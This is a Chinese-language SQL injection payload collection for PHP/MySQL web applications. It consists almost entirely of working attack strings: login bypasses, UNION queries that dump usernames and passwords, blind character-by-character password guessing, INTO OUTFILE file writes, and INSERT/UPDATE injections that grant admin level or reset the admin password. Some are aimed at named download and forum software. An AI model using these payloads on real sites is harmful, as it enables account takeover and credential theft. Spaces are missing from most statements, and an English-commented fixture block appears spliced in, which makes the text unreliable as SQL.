【导读】PHP注入程序
php注射库
'or1=1
'or'1=1
'/*
'%23
'andpassword='mypass
id=-1unionselect1,1,1
id=-1unionselectchar(97),char(97),char(97)
id=1unionselect1,1,1frommembers
id=1unionselect1,1,1fromadmin
id=1unionselect1,1,1fromuser
userid=1andpassword=mypass
userid=1andmid(password,3,1)=char(112)
userid=1andmid(password,4,1)=char(97)
andord(mid(password,3,1))>111(ord函数很好用,可以返回整型的)
'andLENGTH(password)='6(探测密码长度)
'andLEFT(password,1)='m
'andLEFT(password,2)='my
…………………………依次类推
'unionselect1,username,passwordfromuser/*
'unionselect1,username,passwordfromuser/*
='unionselect1,username,passwordfromuser/*(可以是1或者=后直接跟)
99999'unionselect1,username,passwordfromuser/*
'intooutfile'c:/file.txt(导出文件)
='or1=1intooutfile'c:/file.txt
1'unionselect1,username,passwordfromuserintooutfile'c:/user.txt
selectpasswordFROMadminswherelogin='John'INTODUMPFILE'/path/to/site/file.txt'
id='unionselect1,username,passwordfromuserintooutfile
id=-1unionselect1,database(),version()(灵活应用查询)
常用查询测试语句:
select*FROMtablewhere1=1
select*FROMtablewhere'uuu'='uuu'
select*FROMtablewhere1<>2
select*FROMtablewhere3>2
select*FROMtablewhere2<3
select*FROMtablewhere1
select*FROMtablewhere1+1
select*FROMtablewhere1--1
select*FROMtablewhereISNULL(NULL)
select*FROMtablewhereISNULL(COT(0))
select*FROMtablewhere1ISNOTNULL
select*FROMtablewhereNULLISNULL
select*FROMtablewhere2BETWEEN1AND3
select*FROMtablewhere'b'BETWEEN'a'AND'c'
select*FROMtablewhere2IN(0,1,2)
select*FROMtablewhereCASEWHEN1>0THEN1END
例如:夜猫下载系统1.0版本
id=1unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_user
unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1
id=10000unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1andgroupid=1
unionselect1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1(替换,寻找密码)
unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1andord(mid(password,1,1))=49(验证第一位密码)
unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1andord(mid(password,2,1))=50(第二位)
unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1andord(mid(password,3,1))=51
…………………………………………………………
例如2:灰色轨迹变换id进行测试(meteor)
union%20(select%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20where%20eventid%20=%2013)%20order%20by%20eventdate
union%20(select%20allowsmilies,public,userid,'0000-0-0',pass(),version()%20FROM%20calendar_events%20where%20eventid%20=%2010)%20order%20by%20eventdate
构造语句:
selectallowsmilies,public,userid,eventdate,event,subjectFROMcalendar_eventswhereeventid=1union(select1,1,1,1,1,1,1fromuserwhereuserid=1)
selectallowsmilies,public,userid,eventdate,event,subjectFROMcalendar_eventswhereeventid=1union(select1,1,1,1,username,passwordfromuserwhereuserid=1)
union%20(select%201,0,2,'1999-01-01','a',password%20FROM%20user%20where%20userid%20=%205)%20order%20by%20eventdate
union%20(select%201,0,12695,'1999-01-01','a',password%20FROM%20user%20where%20userid=13465)%20order%20by%20eventdate
union%20(select%201,0,12695,'1999-01-01','a',userid%20FROM%20user%20where%20username='sandflee')%20order%20by%20eventdate(查沙子的id)
(selectaFROMtable_namewherea=10ANDB=1ORDERBYaLIMIT10)
select*FROMarticlewherearticleid='$id'unionselect*FROM……(字段和数据库相同情况下,可直接提交)
select*FROMarticlewherearticleid='$id'unionselect1,1,1,1,1,1,1FROM……(不同的情况下)
特殊技巧:在表单,搜索引擎等地方写:
"___"
".__"
"%
%'ORDERBYarticleid/*
%'ORDERBYarticleid#
__'ORDERBYarticleid/*
__'ORDERBYarticleid#
$command="dirc:\";system($command);
select*FROMarticlewherearticleid='$id'
select*FROMarticlewherearticleid=$id
1'and1=2unionselect*fromuserwhereuserid=1/*句中变为
(select*FROMarticlewherearticleid='1'and1=2unionselect*fromuserwhereuserid=1/*')
1and1=2unionselect*fromuserwhereuserid=1
语句形式:建立一个库,插入:
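-- Throw-away fixture for the examples in this note: one database, one
-- `user` table, one seeded row. MySQL dialect (backticks, AUTO_INCREMENT),
-- matching the rest of the file.
CREATE DATABASE IF NOT EXISTS `injection`;
-- The original omitted both the terminating ';' and a USE, so the table
-- was created in whatever schema happened to be current.
USE `injection`;

CREATE TABLE IF NOT EXISTS `user` (
    `userid`   INT(11)     NOT NULL AUTO_INCREMENT,
    `username` VARCHAR(20) NOT NULL DEFAULT '',
    -- Clear-text value, acceptable only because this is a demo fixture;
    -- a real schema stores a salted hash here, never the password itself.
    `password` VARCHAR(20) NOT NULL DEFAULT '',
    PRIMARY KEY (`userid`)
);

-- Explicit column list so the seed row still inserts if columns are added later.
INSERT INTO `user` (`userid`, `username`, `password`) VALUES (1, 'swap', 'mypass');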
插入一个注册用户:
insertINTO`user`(userid,username,password,homepage,userlevel)VALUES('','$username','$password','$homepage','1');
"insertINTOmembres(login,password,nom,email,userlevel)VALUES('$login','$pass','$nom','$email','1')";
insertINTOmembres(login,password,nom,email,userlevel)VALUES('','','','','3')#','1')
"insertINTOmembresSETlogin='$login',password='$pass',nom='$nom',email='$email'";
insertINTOmembresSETlogin='',password='',nom='',userlevel='3',email=''
"insertINTOmembresVALUES('$id','$login','$pass','$nom','$email','1')";
updateuserSETpassword='$password',homepage='$homepage'whereid='$id'
updateuserSETpassword='MD5(mypass)'whereusername='admin'#)',homepage='$homepage'whereid='$id'
"updatemembresSETpassword='$pass',nom='$nom',email='$email'whereid='$id'";
updatemembresSETpassword='[PASS]',nom='',userlevel='3',email=''whereid='[ID]'
"updatenewsSETVotes=Votes+1,score=score+$notewhereidnews='$id'";
常用函数:
DATABASE()
USER()
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()
比如:
updatearticleSETtitle=$titlewherearticleid=1对应函数
updatearticleSETtitle=DATABASE()whereid=1
#把当前数据库名更新到title字段
updatearticleSETtitle=USER()whereid=1
#把当前MySQL用户名更新到title字段
updatearticleSETtitle=SYSTEM_USER()whereid=1
#把当前MySQL用户名更新到title字段
updatearticleSETtitle=SESSION_USER()whereid=1
#把当前MySQL用户名更新到title字段
updatearticleSETtitle=CURRENT_USER()whereid=1
#把当前会话被验证匹配的用户名更新到title字段
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
$req="select*FROMmembreswherenamelike'%$search%'ORDERBYname";
select*FROMmembreswherenamelike'%%'ORDERBYuid#%'ORDERBYname
select*FROMmembreswherenamelike'%%'ORDERBYuid#%'ORDERBYname
selectuidFROMadminswherelogin=''OR'a'='a'ANDpassword=''OR'a'='a'(经典)
selectuidFROMadminswherelogin=''ORadmin_level=1#'ANDpassword=''
select*FROMtablewheremsglike'%hop'
selectuidFROMmembreswherelogin='Bob'ANDpasswordlike'a%'#'ANDpassword=''
select*FROMmembreswherenamelike'%%'ORDERBYuid#%'ORDERBYname